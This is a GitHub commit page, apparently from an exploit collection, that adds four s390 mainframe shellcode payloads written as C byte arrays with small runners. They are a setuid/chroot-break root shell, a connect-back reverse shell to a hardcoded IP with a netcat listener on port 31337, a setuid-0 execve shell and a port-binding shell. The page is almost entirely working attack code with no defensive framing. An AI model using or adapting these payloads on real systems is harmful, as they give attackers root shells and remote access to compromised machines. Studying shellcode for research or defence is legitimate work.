Permalink
Browse files

initial push of all stuff :)

  • Loading branch information...
vanhauser-thc committed Jun 4, 2018
1 parent 1bf4156 commit dfbf6f563fd603e051f44a00e375b592a002b736
Showing 424 changed files with 54,242 additions and 0 deletions.
@@ -0,0 +1,65 @@
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* setuid / setgid / chroot break */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,0 */
"\x41\x90\x10\x98" /* la %r9,152(%r1) */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x98" /* stc %r6,152(%r1) */
"\x17\x22" /* xr %r2,%r2 */
"\x42\x20\x10\x9f" /* stc %r2,159(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x7a" /* lhi %r6,1146 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\x17\x33" /* xr %r3,%r3 */
"\xa7\x68\x04\x73" /* lhi %r6,1139 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x41\x20\x10\x9c" /* la %r2,156(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\xb8\x05\x39" /* lhi %r11,1337 */
"\x1a\xba" /* ar %r11,%r10 */
"\xa7\x68\x04\x58" /* lhi %r6,1112 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\x9d" /* la %r2,157(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x46\xb0\x10\x58" /* bct %r11,88(%r1) */
"\x41\x20\x10\x9e" /* la %r2,158(%r1) */
"\xa7\x68\x04\x89" /* lhi %r6,1161 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x99" /* stc %r6,153(%r1) */
"\x41\x20\x10\xa0" /* la %r2,160(%r1) */
"\x50\x20\x10\xa8" /* st %r2,168(%r1) */
"\x41\x30\x10\xa8" /* la %r3,168(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xa7" /* stc %r4,167(%r1) */
"\x50\x40\x10\xac" /* st %r4,172(%r1) */
"\x41\x40\x10\xac" /* la %r4,172(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x17" /* svc 23 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x41\x2e\x2e\x5c" /* A.. <---- used for mkdir,chroot,chdir */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
@@ -0,0 +1,75 @@
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* connectback shell, use netcat listener from caller : nc -l -p 31337 */
/* ATTENTION ! altough the code is 0x0a and 0x0 free it may be the case */
/* that u wanna connect an ip like : 10.65.120.22 ( in our example ! ) */
/* our 192.168.0.1 ! in these cases u have 0xa and 0x0 in your address */
/* and u should conside to add some selfmodifing code where u patch the */
/* ip address values on the fly, like i did with the svc calls */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xa8" /* la %r9,168(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa8" /* stc %r6,168(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x58\x40\x10\xac" /* l %r4,172(%r1) */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4f" /* lhi %r2,1103 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\x41\x20\x10\xb0" /* la %r2,176(%r1) */
"\x50\x20\x10\xb8" /* st %r2,184(%r1) */
"\x41\x30\x10\xb8" /* la %r3,184(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xb7" /* stc %r4,183(%r1) */
"\x50\x40\x10\xbc" /* st %r4,188(%r1) */
"\x41\x40\x10\xbc" /* la %r4,188(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x0a\x41\x78\x16" /* ip-address to connect back */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
@@ -0,0 +1,39 @@
/* setuid/setgid 0 execve s390 shellcode */
/* code by jcyberpunk@thehackerschoice.com */
char shellcode[]=
"\x0c\x10" /* bassm %r1,%r0 */
"\x41\x90\x10\x48" /* la %r9,72(%r1) */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x48" /* stc %r6,72(%r1) */
"\x17\x22" /* xr %r2,%r2 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x7a" /* lhi %r6,1146 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x49" /* stc %r6,73(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\x49" /* stc %r6,73(%r1) */
"\x41\x20\x10\x4c" /* la %r2,76(%r1) */
"\x50\x20\x10\x54" /* st %r2,84(%r1) */
"\x41\x30\x10\x54" /* la %r3,84(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\x53" /* stc %r4,83(%r1) */
"\x50\x40\x10\x58" /* st %r4,88(%r1) */
"\x41\x40\x10\x58" /* la %r4,88(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x17" /* svc n after self-modification */
"\x07\xfe" /* br %r14 */
"\x2f\x62" /* /b */
"\x69\x6e\x2f\x73" /* in/s */
"\x68\x5c"; /* h\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
@@ -0,0 +1,82 @@
/*----------------------------------------------------------------------*/
/* s390 portbinding shellcode - svc opcode 0x0a free */
/* code by jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[]=
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xd4" /* la %r9,212(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd4" /* stc %r6,212(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\xa7\x28\x04\x50" /* lhi %r2,1104 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\x90\x23\xf0\x80" /* stm %r2,%r3,128(%r15) */
"\x50\x80\xf0\x88" /* st %r8,136(%r15) */
"\xa7\x28\x04\x51" /* lhi %r2,1105 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xd5" /* stc %r6,213(%r1) */
"\x41\x20\x10\xd8" /* la %r2,216(%r1) */
"\x50\x20\x10\xe0" /* st %r2,224(%r1) */
"\x41\x30\x10\xe0" /* la %r3,224(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xdf" /* stc %r4,223(%r1) */
"\x50\x40\x10\xe4" /* st %r4,228(%r1) */
"\x41\x40\x10\xe4" /* la %r4,228(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\ */
main()
{
void (*z)()=(void*)shellcode;
z();
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Oops, something went wrong.

0 comments on commit dfbf6f5

Please sign in to comment.